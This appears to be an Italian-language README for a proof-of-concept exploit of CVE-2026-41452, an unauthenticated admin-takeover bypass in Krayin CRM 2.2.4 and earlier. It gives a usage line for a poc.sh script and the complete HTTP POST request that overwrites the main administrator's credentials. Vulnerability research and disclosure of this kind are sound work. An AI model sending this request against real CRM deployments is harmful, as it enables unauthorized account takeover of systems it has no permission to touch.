
Proof-of-concept di exploit per CVE-2026-41452, un bypass di autenticazione critico in Krayin CRM <= 2.2.4 che consente la compromissione di account admin non autenticati tramite bypass del middleware.
Una Proof of Concept (PoC) che dimostra una vulnerabilità critica di autenticazione mancante (CVE-2026-41452) che interessa Krayin CRM versione 2.2.4 e precedenti.
Questa falla consente ad attaccanti remoti non autenticati di aggirare la logica del middleware di installazione dell'applicazione (CanInstall) iniettando specifici header HTTP, portando a una completa sovrascrittura della configurazione dell'account amministratore principale.
[!WARNING]
Disclaimer: Questo repository e le informazioni in esso contenute sono forniti strettamente per scopi educativi, di ricerca sulla sicurezza e di auditing difensivo autorizzato. Il test o lo sfruttamento non autorizzato di sistemi informatici è severamente illegale. L'autore non si assume alcuna responsabilità per qualsiasi uso improprio di questo materiale.
CVE ID: CVE-2026-41452
Tipo di vulnerabilità: Autenticazione mancante / Bypass del middleware
Gravità: Critica (CVSS 9.8)
Software interessato: Krayin CRM <= 2.2.4
Versione corretta: Krayin CRM >= 2.2.5
La vulnerabilità risiede nel middleware di setup dell'applicazione. Un attaccante non autenticato può aggiungere un header X-Requested-With: XMLHttpRequest a un payload appositamente creato che prende di mira l'endpoint /install/api/admin-config-setup. Questo sopprime il controllo di reindirizzamento previsto all'interno del middleware CanInstall, esponendo un'operazione di database updateOrInsert non autenticata che prende di mira l'ID hardcoded (1) dell'amministratore principale del sistema.
Esegui lo script contro un'istanza target che sei autorizzato a testare:
./poc.sh <TARGET-URL> <USERNAME> <EMAIL> <PASSWORD>
Sotto il cofano, il bypass si attiva tramite la seguente struttura di transazione HTTP:
POST /install/api/admin-config-setup HTTP/1.1
Host: target-crm.local
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
name=test1&[email protected]&password=Password123